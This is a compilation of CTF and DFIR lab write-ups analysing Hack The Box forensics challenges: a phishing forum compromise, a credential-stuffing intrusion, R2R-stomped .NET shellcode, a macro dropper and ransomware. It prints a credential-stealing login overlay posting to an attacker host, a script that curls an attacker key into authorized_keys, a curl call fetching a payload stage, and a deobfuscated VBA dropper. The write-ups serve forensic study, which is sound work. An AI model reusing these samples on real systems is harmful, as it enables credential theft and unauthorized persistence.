I have tried other ways to acquire something closer to the Python code - but the best what I had was running following with the Python 3.13:

import marshal,lzma,gzip,bz2,binascii,zlib
import importlib

# Compressed data (example)
compressed_data = b'<<bytecode>>'

marshalled_object = bz2.decompress(compressed_data)
code = marshal.loads(marshalled_object)
pyc_data = importlib._bootstrap_external._code_to_timestamp_pyc(code)

with open("mal_313.pyc", "wb") as out_file:
    out_file.write(pyc_data)

Then running pycdc (https://github.com/zrax/pycdc) on acquired PYC file.

This was most certainly to the fact that Py-Fuscate was used with combination of unsupported Python versions for pycdc and decompyle3.

Just quick recap of the Forensics tasks - more details coming in following days, have a lot to do outside the area of offensive security so, forgive me for this format this time. Please follow-up on Discord and other socials for updates.

Challenges described below are from the Hack The Box Cyber Apocalypse 2025 CTF - Tales From Eldoria.
Cover background image and HTB logo belongs to the Hack The Box (I’m not an author of those images).

Thorin’s Amulet

PowerShell payload deobfuscation. Decode command in script

powershell.exe -NoProfile -NonInteractive -EncodedCommand /Base64 command/

Then

curl -H "X-ST4G3R-KEY: 5337d322906ff18afedc1edc191d325d" http://korp.htb/a541a

to obtain the next stage. Last stage contains encoded flag (just run it in Linux pwsh).

A new Hire

Straightforward multistage payload, at the end there is a base64 encoded flag.

Read email, navigate to storage.microsoftcloudservices.com:[PORT]/index.php where another URL http://IP:PORT/3fe1690d955e8fd2a0b282501570e1f4/resumes/ contains malicious file hiding as a PDF file

That contains one more base64 PowerShell encrypted command, where again, base64 encoded flag is located.

Silent Trap

In the PCAP file we can find contents of mails, packet 72 contains mail from threat actor with attachment Eldoria_Balance_Issue_Report.pdf.exe. Bytes can be extracted from packet 614. We can decompile the program and discover the cypher is RC4 where same function works for encryption & decryption and it exfitrates data through IMAP protocole. Combing through the PCAP file we can find whole communication between host and C&C at 192.168.91.173. Now that we have the decryptor/encrypt from reverse engineered binary we can decode all transfered data and answer other questions.

Stealth Invasion

Delivered memdump.elf Windows memory dump can be analyzed with volatility3. The issue in my side was outdated installation, after updating to latest there were no issues with volatility modules.

Cave Expedition

All Windows logs were pruned after operation, only traces are in the Microsoft-Windows-Sysmon_Operational.evtx from which we can decode all PowerShell payloads to dicover what happened. Slowly we deobfuscate stage by stage malicious payloads finally to obtains the ecryption method - which once again happen to be XORing (which is reversable regadless of how many XOR factors were used - here 2 times). Then map.pdf.secured can be decrypted.

ToolPie

Tales for the Brave

Incident Details

Name: Bumblebee
Category: DFIR
Difficulty: Easy (Solved)

An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.

Evidences

All evidence files are marked as readonly right after acquiring and their hash (sha256) is written down. Read-only attribute does not affect the hash of a file.

01: ZIP archive, password protected (hacktheblue)

$ bumblebee.zip
aa2f772a208f4bec24e99242b541b95302175a0960f326d107f5bfddbcf61775

02: gzip compressed data

$ bumblebee.zip/incident.tgz
58bf64aeabde58d057ef690c3f41aed48fdcafc3c81e3382df95c34ad1f51a24

03: POSIX tar archive

$ bumblebee.zip/incident.tgz/incident.tar
6822ffb99b274523f741d37236f018b0ef6b1b945d9a92d88ba9911d2ca26869

04: ASCII text

bumblebee.zip/.../access.log
43ca54b7fce36f772d8e0705625b2f54eaf91a3d32e71d342b1c4af7a16ce577

05: SQLite 3.x database

bumblebee.zip/.../phpbb.sqlite3
ec7579dbe5435f1972a44d462a8dd0b76db994be4eb5f68b5c3622164418940f

Analysis

Customer provided the logs from web server (forum) and a database file (SQLite3). Name of the databse file and some requests in logs suggest that the forum was phpBB running on the PHP engine.

access.log

Consists only with GET/POST requests with few repetitions of OPTIONS:

::1 - - [25/Apr/2023:15:52:40 +0100] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.56 (Debian) (internal dummy connection)"

Shoting blindly with some potential RCEs

grep -iE "(sh|cmd|exec)" access.log | grep -ivE "(macintosh|sheet)

Checking for some unusual requests.

grep -E "(DELETE,PUT)" access.log

Questions

In this scenario we have 10 questions to answer.

1. What was the username of the external contractor?

Grepping the logs for "username", "user", "login", "sign" returns nothing useful at the moment, so I'm looking into the database file.

$ sqlite -readonly phpbb.sqlite3

sqlite> .output db/phpbb_log.sql
sqlite> .dump phpbb_log
sqlite> .output db/phpbb_users.sql
sqlite> .dump phpbb_users

At database we can see two users with a mail domain '@contractor.net'. I have no idea which one is the contractor in question but nevertheless one of the usernames is the correct answer.

2. What IP address did the contractor use to create their account?

This can be found in phpbb_logs table, with action LOG_USERS_ADDED.

3. 

   What is the post_id of the malicious post that the contractor made?

Ah, so the contractor was the one who compromised the administrator account. I thougth that "they" meant owners of that Guest WiFi, but ok.

Grepping access.log for post_id returns nothing. Dumping php table:

sqlite> .output db/phpbb_posts.sql
sqlite> .dump phpbb_posts

Fortunatelly there are not really must post there. Malicious post with cookie stealing injection is there.

Injected form (pruned of unnecessary elements) is below.

<div>
    //...
    <script type="text/javascript">
        function sethidden() {
            const d = new Date()
            d.setTime(d.getTime() + 24 * 60 * 60 * 1000)
            let expires = 'expires=' + d.toUTCString()
            document.cookie = 'phpbb_token=1;' + expires + ';'
            var modal = document.getElementById('zbzbz1234')
            modal.classList.add('hidden')
        }
        document.addEventListener('DOMContentLoaded', function (event) {
            let cookieexists = false
            let name = 'phpbb_token='
            let cookies = decodeURIComponent(document.cookie)
            let ca = cookies.split('; ')
            for (let i = 0; i < ca.length; i++) {
                let c = ca[i]
                while (c.charAt(0) == ' ') {
                    c = c.substring(1)
                }
                if (c.indexOf(name) == 0) {
                    cookieexists = true
                }
            }
            if (cookieexists) {
                return
            }
            var modal = document.getElementById('zbzbz1234')
            modal.classList.remove('hidden')
        })
    </script>
    //...
    <div class="modal hidden" id="zbzbz1234" onload="shouldshow">
        <div id="wrap" class="wrap"> <a id="top" class="top-anchor" accesskey="t"></a>
            <form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username"
                target="hiddenframe">
                <div class="panel">
                    <div class="inner">
                        <div class="content">
                            <h2 class="login-title">Login</h2>
                            <fieldset class="fields1">
                                <dl>
                                    <dt><label for="username">Username:</label></dt>
                                    <dd><input type="text" tabindex="1" name="username" id="username" size="25"
                                            value="" class="inputbox autowidth"></dd>
                                </dl>
                                <dl>
                                    <dt><label for="password">Password:</label></dt>
                                    <dd><input type="password" tabindex="2" id="password" name="password" size="25"
                                            class="inputbox autowidth" autocomplete="off"></dd>
                                </dl>
                                <dl>
                                    <dd><label for="autologin"><input type="checkbox" name="autologin"
                                                id="autologin" tabindex="4">Remember me</label></dd>
                                    <dd><label for="viewonline"><input type="checkbox" name="viewonline"
                                                id="viewonline" tabindex="5">Hide my online status this
                                            session</label></dd>
                                </dl>
                                <dl>
                                    <dt>&nbsp;</dt>
                                    <dd> <input type="submit" name="login" tabindex="6" value="Login"
                                            class="button1" onclick="sethidden()"></dd>
                                </dl>
                            </fieldset class="fields1">
                        </div>
                    </div>
                </div>
            </form>
        </div>
    </div>
</div>

CSS styling used to "override" the browser content:

.modal {
    position: fixed;
    top: 0;
    left: 0;
    height: 100%;
    width: 100%;
    z-index: 101;
    background-color: white;
    opacity: 1;
}

When someone enters credentials and tries to sing-in, username and password were redirected to the php script attacker controls:

<form action="http://10.10.0.78/update.php" method="post" ...

4. What is the full URI that the credential stealer sends its data to?

Answer: http://10.10.0.78/update.php

5. When did the contractor log into the forum as the administrator? (UTC)

   

6. In the forum there are plaintext credentials for the LDAP connection, what is the password?

There is a plugin added to the phpBB that enabled LDAP connections, so let't try grepping config for the hope that LDAP connection details are stored there.

$ sqlite3 phpbb.sqlite3 ".dump phpbb_config" | grep -i ldap

7. What is the user agent of the Administrator user?

User agents are listed in the access.log

8. What time did the contractor add themselves to the Administrator group? (UTC)

Returning to the phpbb_logs table.

date -u -d @1682506431 "+%d/%m/%Y %H:%M:%S"

9. What time did the contractor download the database backup? (UTC)

Again, access.log

$ grep -iE "(.sql.)" access.log

10. What was the size in bytes of the database backup as stated by access.log?

Size is in the same line as previous answer.

Answer: 34707

Data Recovery

None required.

Lessons Learned

• Grepping sqlite3 outputs (sqlite3 [dbfile] ".dump ..." | grep ...)

• Converting Unix timestamp to UTC (date -u -d @1682506431 "+%d/%m/%Y %H:%M:%S")

Additional readings

• NIST Computer Security Incident Handling Guide

Incident Details

Name: Meerkat(Retired)
Category: SOC
Difficulty: Easy (Solved)

As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren't the most security aware. As our new security provider we'd like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.

Evidences

01: ZIP archive, password protected (hacktheblue)

$ meerkat.zip
a76867ade304c8081e2023cbf2977c65e8c146180b2e0ff760e4059d042c2a5a

02: JSON file

$ meerkat.zip/meerkat-alerts.json
012aa4e8aae5d500c001510d6e65567eb0cdbfffe2dab9a119b66f7770c222be

03: pcapng capture file

$ meerkat.zip/meerkat.pcap
aa3838dbd634f9798d1e9505d243a4fee1d340d6e25e2f0c9648dd64e2178dbf

Analysis

In this scenario we have 10 questions to answer.

1. We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

$ cat meerkat-alerts.json | jq .[].alert.signature | sort | uniq > alerts.sorted.unique

I'm assuming the application in question is the mentioned Business Management Platform. There are couple lines containing same name (blurred):

2. We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

Browsing the logs I can see the multiple alerts for "Default User Login Attempt" and "python-requests".

Answer: Credential Stuffing

3. Does the vulnerability exploited have a CVE assigned - and if so, which one?

Clear in the logs.

Answer: CVE-2022-25237

4. Which string was appended to the API URL path to bypass the authorization filter by the attacker's exploit?

CVE-2022-25237 exploit is performed by appending ;i18ntranslation or /../i18ntranslation/ to the end of a URL, so I'm opening meerkat.pcap in Wireshark. Alerts indicate that Credential Stuffing was performed from 138.199.59.221 to 172.31.6.44. Then I just looked in the requests to identify which of two strings was used.

Answer: ;i18ntranslation

5. How many combinations of usernames and passwords were used in the credential stuffing attack?

Now let's use commandline TShark to filter and format output so that we have easier way to answer

$ tshark -r meerkat.pcap -2 -R "http.request.full_uri contains loginservice" -T fields -e "tcp.segment_data" | sort | uniq |  xxd -p -r

Pass meerkat.pcap file to tshark, filter packets by only those where request URI contains loginservice, show only single field - tcp.segment_data (that holds POST body), then sort those values and output unique values to xxd tool that will output in ASCII format.

Unfortunately I was not able to break the lines after xdd so I've done that in the text editor. There are 57 unique combinations, one of which (username=install&password=install) is not a part of credential stuffing.

Answer: 56

6. Which username and password combination was successful?

Search in Wireshark for the response that sets "JSESSIONID" cookie, then follow the HTTP stream. See what credentials were used.

7. If any, which text sharing site did the attacker utilise?

This time I was lucky becasue the answer was in the previous screen/filter.

Answer: pastes.io

Bonus: contents of the reqested URLs are still active and contains scripts that adds SSH key to the authorized_keys collection and restarts SSH daemon.

8. Please provide the filename of the public key used by the attacker to gain persistence on our host.

From the Bonus section of the last question - content of the first script:

#!/bin/bash
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart

Answer: hffgra4unv

9. Can you confirmed the file modified by the attacker to gain persistence?

Again, answer in the above script

Answer: /home/ubuntu/.ssh/authorized_keys

10. Can you confirm the MITRE technique ID of this type of persistence mechanism?

Navigate to MITRE ATT&CK® -> Persistence -> SSH Authorized Keys.

Answer: T1098.004

Data Recovery

None required.

Lessons Learned

• jq for easier querying JSON data

• tshark for filtering and parsing PCAP files

Additional readings

• NIST Computer Security Incident Handling Guide

As the days for the final round of the game, draw near, rumors are beginning to spread that one faction in particular has rigged the final! In the meeting with your team, you discuss that if the game is indeed rigged, then there can be no victory here... Suddenly, one team player barged in carrying a Windows Laptop and said they found it in some back room in the game Architects' building just after the faction had left! As soon as you open it up it turns off due to a low battery! You explain to the rest of your team that the Legionnaires despise anything unethical and if you expose them and go to them with your evidence in hand, then you surely end up being their favorite up-and-coming faction. "Are you Ready To Run with the Wolves?!"

Type: Forensics
Difficulty: Insane
Event: Hack The Box Cyber Apocalypse 2024: Hacker Royale (ctftime)

Initial recon

Given: Windows hibernation file.

$ hiberfil.sys (read-only)
f9f96147bfe041e3174eb988e4fc10e16c17a82b20bb6b7f9aff23126b523699

Investigation

Learned by experience, whenever I'm dealing with the memory dumps I start with The Volatility Framework. Unfortunately my hopes were quickly vanished becasue volatility can't operate directly on the hiberfil.sys. I scratched my head becasue it seemed unlikely that noone even thought about adding support for the hibernation files to the such profound tool.

Luckily for all of us, as of the time this CTF event started, ForensicXlab already did the work and created a pull request for volatility3 adding two new plugins: windows.hibernation.Info and windows.hibernation.Dump.

Seeing how long it took someone to finally come up with the plugins that easen working with hibernation memory dumps - 👏 for the k1nd0ne, arigato!

After switching to the PR branch, my volatility was ready to create the memory_layer.raw file so I can finaly start analysis.

For the sake of simplicity I'm using vol3 alias for python c:/ws/tools/volatility3/vol.py

$ git fetch origin pull/1036/head:feature/hibernation-layer
$ vol3 -f hiberfil.sys windows.hibernation.Dump --version 0

Why am I using version 0? I just assumed that memory dump originates from Windows 10, and wanted to start from the latest possible

• 0 [Windows 10 1703 to Windows 11 23H2]

• 1 [Windows 8/8.1]

• 2 [Windows 10 1507 to 1511]

• 3 [Windows 10 1607]

$ memory_layer.raw (read-only)
0cfb69681ee202f8f65245301ec113f6ea5fb1546f8bac0279baf65d8a800bc0

Analyzing memory dump

Now it's the most interesting and time-taking phase. I dump and organize various outputs from volatility simultanously trying to note down anything that could be analized later in the greater details. This was the first time when I was solving the Insane difficulty challenge, so my choice of plugins expanded to the ones I've never tried - becasue I really couldn't pinpoint what else could I do with what I have at my disposal. But about this a bit later.

I have used following plugins (some of them targeted on the specific processes):

- windows.pslist.out
- windows.dumpfiles.DumpFiles
- windows.cmdline.CmdLine.out
- windows.envars.Envars.6348.out
- windows.filescan.FileScan.out
- windows.mftscan.MFTScan.out
- windows.mbrscan.MBRScan.out

- windows.netscan.NetScan.out
- windows.netstat.NetStat.out
- windows.dlllist.DllList.out
- windows.handles.Handles.6348.out
- windows.handles.Handles.out
- windows.modscan.ModScan.out
- windows.modules.Modules.out
- windows.privileges.Privs.6348.out
- windows.registry.hivelist.HiveList.out
- windows.registry.hivelist.HiveScan.out
- windows.vadinfo.VadInfo.out

- windows.strings.Strings

Top ones are what usually was enough for me to find the malicious process and dump it so I can analyze further, discover shell run command or suspicious environment variable. In the middle are ones that I run depending on the context finshing with these I've never touched. windows.strings.Strings is a really "I don't know what I am doing, just grab me all strings from that file and I will figure it out later when you finish, in like... 4 or 5 hours from now".

Here is my collection

As you can probably see one of the process cought my attention and will forever have special place in my heart 😅 .

Process #6348

TheGame.exe is not usual executable you find on Windows system. Especialy one residing in this location (thanks to windows.cmdline.CmdLine):

6348    TheGame.exe     "C:\Users\architect\Desktop\publish\TheGame.exe"

Same executable appear in the list of connections

Offset            Proto    LocalAddr    LocalPort    ForeignAddr    ForeignPort    State    PID        Owner        Created
0xac8d5f6dd8a0    TCPv4    10.0.2.15    49829        20.12.23.50    443            CLOSED    6348    TheGame.exe    2024-02-08 22:43:14.000000

..but again, cul-de-sac. It is easy to establish that 20.12.23.50 belongs to Windows Update service. Chasing answer if it is true, is not my concern especially because connection was established over SSL - and that's definitely not a common thing to put into CTF challenge.

Anyway, I continue with dumping the binary from the process.

$ vol3 -f memory_layer.raw windows.pslist.PsList --pid 6348 --dump

Hmm, wrong file?

Maybe the binary is incomplete/malformed. Let's see if there are other places from which we can get the binary.

After checking all files it becomes clear that we won't get anything apart from one file. I proceed with decompiling TheGame.dll in ILSpy.

Let's have a look at the Main(..) method.

1. Try loading list of DLLs.

2. Initilize AMSI engine.

3. Tests the engine using hardcoded binary data.

4. Load kernel32.dll test it with AMSI.

5. If AMSI does not report file as malicious, tries injecting DLL with the same binary data that raises AMSI alert.

6. Goes limbo with manyNop commands.

Ok, a lot is happening there so let's start with some definitions.

Although I suspect what that base64 encoded binary data is, let's throw it into CyberChef.

Okey, let's think for a moment.

In the main(..) method of a TheGame.dll .NET library there are 8 more DLLs loaded, do nothing with them, then proceed to load some AMSI module with a purpose of.. writing some bytes to the core Windows library.. when for sure it is already in use! So that won't gonna happen - that's why the exception is swollen in try/catch clause.

Ok now I will start talking like it is just an another CTF challenge, another Mr. Know-it-all. But reaching from this point to the moment when I realized what I have to do, took me 4 (four) days. To be more precise something around 20-25hrs but because of what is going to happen is probably why this challenge is rated as Insane.

It's either a rabbit hole that someone put some effort to setup, or there is something that I am missing from the picture.

You explain to the rest of your team that the Legionnaires despise anything unethical and if you expose them and go to them with your evidence in hand, then you surely end up being their favorite up-and-coming faction. "Are you Ready To Run with the Wolves?!"

Why are the Ready To Run and Wolves capitalized?

..i don't think this is what the author wants me to search for... but for sure I can recommend this:

https://open.spotify.com/track/6r6n5OmXkdsOxN2iCj5UE0?si=82cfd1ed1bba4419

Oh you sneaky s..

Ready to run with the wolves

I'm in no competence to explain what ReadyToRun Deployment, Ahead-Of-Time Compilation are and how important they are not only for this challenge but for all dotnet developers and security researchers. That's why I am recommending to read great articles and resources I've gathered in the last section as well as other write-ups for this challenge. And for now let me explain this concept in the Minimum-Valuable-Product way.

R2R and AOT

Step back. Source Code -> IL -> Native. CIL programming language code is translated to the Common Intermidiate Language which then Common Language Runtime executes by performing Just-in-time Compilation, compiling CIL to native instructions. This happens this way to deliver versatility for CIL languages - software can run on different platforms, not only on that on which source code was compiled (because each platform has its CLR).

(source: https://medium.com/@kunaltandon.kt/c-clr-il-jit-compilation-code-access-security-explained-269124121f5)

Ahead-Of-Time was a term existing for some time now, but R2R was introduced with the release of .NET Core 3.0. If you are familiar with the term Template Specialization (or similar) - you are golden. At least that's how I understand whats happening.

So basicaly, you have your source code translated to CIL, generic code. But instead of waiting for your software to run on specific platform and let CLR to compile your CIL into native machine instructions - you just compile it ahead of time. Then you include that compiled, native instructions into your software so it is ready to run on that platform.

R2R Stomping

Ok, so how does it relate to our TheGame.dll? See, when decompiler inspects library or executable it just by default run through the IL and extrapolates on what the software is doing. But when such software runs, it executed the native instructions - provided both from CLR and AOT Compilation.

What if.. someone compiles the DLL with R2R targeted specific architecture - then for example injects own native instructions overridding the AOT compilation. Assuming there is just enough space in R2R portion of assembly to hold new payload, that one will end up having a single software copy that can behave very differently from how it was coded!

I encourage at least glancing throught the R2R Stomping article for more detailed presentation.

This, my ladies and gents - is the reason I was loosing my mind over this one challenge for a couple last days.

Detecting R2R

Actually there are many signs that we are dealing with R2R assembly - I just didn't know about them 😉

dotPeek:

dnSpy:

R2R File Format specifies that (quote from the linked GitHub document):

• The PE file is always platform specific

• CLI Header Flags field has set COMIMAGE_FLAGS_IL_LIBRARY (0x00000004) bit set

• CLI Header ManagedNativeHeader points to READYTORUN_HEADER

And finally, if you are not a fan of manual/visual analysis - here comes the quickest way to check if you are dealing with the R2R assembly - rule for the ultimate Yara.

import "pe"
// source: 
// https://research.checkpoint.com/2023/r2r-stomping-are-you-ready-to-run/

rule r2r_assembly
{
    meta:
        author = "jiriv"
        description = "Detects dotnet binary compiled as ReadyToRun - form of ahead-of-time (AOT) compilation"
    condition:
        // check if valid PE
        uint16(0) == 0x5a4d and uint16(uint32(0x3c)) == 0x4550 and
        // check if dotnet -> .NET Directory is present
        pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].virtual_address != 0 and
        // check if ManagedNativeHeader exists -> ManagedNativeHeader RVA is not 0 inside .NET Directory
        uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].virtual_address) + 0x40) != 0 and
        // check if it is R2R -> RTR magic signature is present (0x00525452 == "RTR" in ascii)
        uint32(pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].virtual_address) + 0x40))) == 0x00525452
}

Extracting shellcode

Now what we know what TheGame.dll really is, lets see the Main(..) method once again, but from different perspective. Load the assembly into ILSpy, right click on the Main(..) and choose "Decompile to new tab". We can stack two of these horizontally so we can have easier time to see the difference.
In one of the tabs select "ReadyToRun" (to be honest, I've never been aware that this dropdown exists..).

I'm not a assembly guy, but what can be seen in ReadyToRun view, is nothing about loading some DLLs and checks. There are a lot of mov instructions and no binary loading, no jumps, etc.

At the top of the file/view first instruction is at 0x1DB0 . The moment when shellcode ends is a moment when similarity between IL view and R2R view starts - 0x33B0.

Let's then carve it out then directly from the file.

$ shellcode.bin (read-only)
acb6c622f2ff6dafdb1391561b26d2abaa3944e342510c6ed2afcc4231cc0680

Shellcode analysis

Because trying to run the shellcode directly on a live system would be of the same level of responsibility as running the Invoke-Expression or eval copied directly from the malware (not really responsible and smart) - there are some solutions that enables shellcode emulation.

To be honest it's not even that easy to run or analyze such shellcode, well, because these are just the plain assembly instructions - no PE headers so it is not recognized as "a thing" in dissasemble tools, nor strings won't help in our situation, file command returns just "data".

I'm going to use speakeasy Python module for that purpose.

Quick tip: after git cloning the speakeasy repository and installing requirements, if you would like to call speakeasy regardless what you current working directory add following to your shell profile (.bashrc, .zshrc) with the correct path of course.
export PYTHONPATH="$PYTHONPATH:/opt/speakeasy"

Voilà! It runs, but apparently stops after it verifies that current host is not "ARCH_WORKSTATION-7". Let's change it, shall we?

Finally 🎉

Additional readings

• ⭐ Official HTB write-up

• ⭐ R2R Stomping – are you ready to run?

• ⭐ GitHub/dotnet/runtime: ReadyToRun File Format

• Emulation of Malicious Shellcode With Speakeasy

• Using SmartAssembly with ReadyToRun images (.NET Core 3)

• Microsoft: ReadyToRun Compilation

• Conversation about crossgen2

• POOF write-up from HackTheBoo 2022 using volatility2

• volatility3 pull request with the hibernation plugins by ForensicXlab

• Volatility3: Modern Windows Hibernation file analysis by ForensiXlab

In the bustling city of KORP™, where factions vie in The Fray, a mysterious game emerges. As a seasoned faction member, you feel the tension growing by the minute. Whispers spread of a new challenge, piquing both curiosity and wariness. Then, an email arrives: "Join The Fray: Embrace the Challenge." But lurking beneath the excitement is a nagging doubt. Could this invitation hide something more sinister within its innocent attachment?

Type: Forensics
Difficulty: Hard
Event: Hack The Box Cyber Apocalypse 2024: Hacker Royale (ctftime)

Initial recon

Given: single DOCM file.

$ invitation.docm (read-only)
ce9f4c1bd44ff0a9131e63cf4f8c0ce5c1c8e4eb77bffe843a325d08b34eb9bb

Investigation

DOCM is are macro-enabled Microsoft Word document format. Analysis of this kind of files are in my opinion the most popular tasks whenever forensics category is included in CTF events. I covered two of those in my blog:

• HTB Business CTF 2021: badRansomware

• HackTheBoo 2022: Halloween Invitation

So without further ado, let's extract that VBA macro using olevba Python script.

$ olevba invitation.docm
//... (output trimmed for readability)

VBA macro

I will save you reading the origal, obfuscated script.

Stage 01 (deobfuscated)

Public jspath As String
Public appdataPath As String

Function xorString(given_string() As Byte, length As Long) As Boolean
    Dim xor_key As Byte
    xor_key = 45
    For i = 0 To length - 1
        given_string(i) = given_string(i) Xor xor_key
        xor_key = ((xor_key Xor 99) Xor (i Mod 254))
    Next i
    xorString = TRUE
End Function

Dim filenumber
Dim file_length As Long
Dim length As Long
file_length = FileLen(ActiveDocument.FullName)
filenumber = FreeFile
Open (ActiveDocument.FullName) For Binary As #filenumber
Dim byteArray() As Byte
ReDim byteArray(file_length)
Get #filenumber, 1, byteArray
Dim convertedToUnicode As String
convertedToUnicode = StrConv(byteArray, vbUnicode)
Dim singeMatch, matches
Dim regexp
Set regexp = CreateObject("vbscript.regexp")
regexp.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
Set matches = regexp.Execute(convertedToUnicode)
Dim indexOfFirstMatch
If matches.Count = 0 Then
    GoTo lable1
End If
For Each singleMatch In matches
    indexOfFirstMatch = singleMatch.FirstIndex
    Exit For
Next
Dim secondByteArray() As Byte
Dim arbitraryLength As Long
arbitraryLength = 13082
ReDim secondByteArray(arbitraryLength)
Get #filenumber, indexOfFirstMatch + 81, secondByteArray
If Not xorString(secondByteArray(), arbitraryLength + 1) Then
    GoTo lable1
End If
appdataPath = Environ("appdata") & "\Microsoft\Windows"
Set fileSystemObject = CreateObject("Scripting.FileSystemObject")
If Not fileSystemObject.FolderExists(appdataPath) Then
    appdataPath = Environ("appdata")
End If
Set fileSystemObject = Nothing
Dim fileNumber2
fileNumber2 = FreeFile
jspath = appdataPath & "\\" & "mailform.js"
Open (jspath) For Binary As #fileNumber2
Put #fileNumber2, 1, secondByteArray
Close #fileNumber2
Erase secondByteArray
Set shellObject = CreateObject("WScript.Shell")
shellObject.Run """" + jspath + """" + " vF8rdgMHKBrvCoCp0ulm"
ActiveDocument.Save
Exit Sub
lable1:
Close #fileNumber2
ActiveDocument.Save
End If
End Sub

1. Read current file (DOCM) binary.

2. Search for the pattern in the binary data.

3. Run custom XORing function over the succeeding 13082 bytes.

4. Resulting binary data is saves as a mailform.js.

5. WScript mailform.js is then executed with the argument vF8rdgMHKBrvCoCp0ulm

I have transcribed the VBA into the Python script to obtain the mailform.js.

Stage 01 (Python)

#!/usr/bin/python
import re

def xorString(given_string, length):
    xor_key = 45
    for i in range(length):
        given_string[i] = given_string[i] ^ xor_key
        xor_key = ((xor_key ^ 99) ^ (i % 254))
    return given_string

def main():    
    with open('invitation.docm', 'rb') as docmFile:
        byteArray = bytearray(docmFile.read())
        convertedToUnicode = byteArray

        pattern = b'sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa'
        matches = re.finditer(pattern, convertedToUnicode)

        indexOfFirstMatch = None
        for singleMatch in matches:
            indexOfFirstMatch = singleMatch.start()
            break

        if indexOfFirstMatch is None:
            print('pattern not found')
            return

        arbitraryLength = 13082
        docmFile.seek(indexOfFirstMatch + 80)
        secondByteArray = bytearray(docmFile.read(arbitraryLength))

        secondByteArray = xorString(secondByteArray, arbitraryLength)

        with open("mailform.js", 'wb') as docmFile2:
            docmFile2.write(secondByteArray)

if __name__ == "__main__":
    main()

This resulted in the JS file.

Stage 02 (mailform.js)

Because it is a JavaScript we can leverage it very carefuly to let the browser decode the code for us and retrieve the next payload. Please do notice that I've marked the hazardous eval(..) function that has to be removed to neutralize the payload. I have replaces it with a console.log(..).

You never want any kind of eval or Invoke-Expression slip through.

Stage 03

More JavaScript to deobfuscate. Unless..

And after decoding this in CyberChef 🎉

Additional reading

• MITRE T1137.001 (Office Application Startup: Office Template Macros)

• ⭐ Official HTB write-up

• Write-up: HTB Business CTF 2021: badRansomware

• Write-up: HackTheBoo 2022: Halloween Invitation

Our clan's network has been infected by a cunning ransomware attack, encrypting irreplaceable data essential for our relentless rivalry with other factions. With no backups to fall back on, we find ourselves at the mercy of unseen adversaries, our fate uncertain. Your expertise is the beacon of hope we desperately need to unlock these encrypted files and reclaim our destiny in The Fray.
Note: The valuable data is stored under \Documents\Work

Type: Forensics
Difficulty: Hard
Event: Hack The Box Cyber Apocalypse 2024: Hacker Royale (ctftime)

Initial recon

Given: single AD1 file.

$ Confinement.ad1 (read-only)
d8cc0505f4a125bb24eaa0a955bc83800678a24570daefa3ab0936a9a095a1e3

Investigation

Before opening the file I'm marking the files as readonly and noting down its hash. File system contained in AD1 image can be browsed with a FTK Imager.

From the challenge description we know that:

• owner of the files was struck with a ransomware rendering the files unusable,

• important files are located under \Documents\Work; because this is Windows system I assume it's %USERPROFILE%\Documents\Work

• objective: recover file

Retrieving encrypted files

Content of the important directory

I'm inspecting the ULTIMATIM.hta file using the FTK Viewer preview panel. It looks like a ransomware note.

The only thing that is worth noting down is the Faction ID that could be used later.

Faction ID = 5K7X7E6X7V2D6F

I extract the Applicants_info.xlsx.korp file.

Applicants_info.xlsx.korp (read-only)
316954ea99040a2e6b9aef47d230063c1f03e4515e1552f91304dd0769d8385e

In the meantime I do explore other files in the directory, but these are not relevant for us right now, so I am not elaborating on this one. I did also check hashes for other ransomware notes to make sure I did not falsly assume that all are the same - but they are the same.

Because the hex preview in the FTK Viewer really looked like some mangled bytes, I have no hopes that strings won't find anything of value, and I am not mistaken.

Right now I don't have tools to restore the file.

Malware hunting

Let's backtrack a bit. We are looking at the end of the process and we have to look for the evidences of previous steps that most certainly had occurence. So what are these steps? These vary from the source to source, but let's take the core ones:

1. Infection.

2. Execution - data exfiltration, data encryption

3. Spreading.

4. Persistence.

5. Clean up.

So at this point we are looking for any traces of

• unknown files (in Downloads, Desktop, c:\temp, etc), that includes especially executable files (DLLs and EXEs)

• suspicious connections (HTTP over port 80, nc uses)

• any PowerShell executions (regular users rarely if ever use PowerShell; system rarely)

• anything really that outstands

Reverse shell

This one is a suspicious file and should not be there - without doubt. Unfortunately, it is of no use in this scenario.

ATS_setup.. I wonder what could that be..

Windows Timeline

Using famous Eric Zimmerman's Windows 10 Timeline database parser allowed me to browse through the ActivitiesCache.db - nothing paticulary interesting (7z2107-x64.exe, ftk imager.exe, treesizefree.exe).

Windows Defender

Finally, I started analyzing the Windows Defender logs (C:\ProgramData\Microsoft\Windows Defender\Support\). Here are the findings:

• (HackTool:Win32/Mimikatz!pz) C:\Users\tommyxiaomi\Documents\mimikatz.exe

• (Trojan:Win32/CryptInjecp) C:\Users\tommyxiaomi\Documents\fscan64.exe

• (Trojan:Win32/Wacatac.B!mp) C:\Users\tommyxiaomi\Documents\intel.exe

• (Trojan:Win32/MpTamperDisableFeatureWd.p) C:\Windows\System32\Dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet

• (Trojan:Win32/MpTamperDisableFeatureWd.p)

• (VirTool:Win32/DefenderTamperingRestore) regkeyvalue hklm\software\microsoft\windows defender\spynet\DisableBlockAtFirstSeen

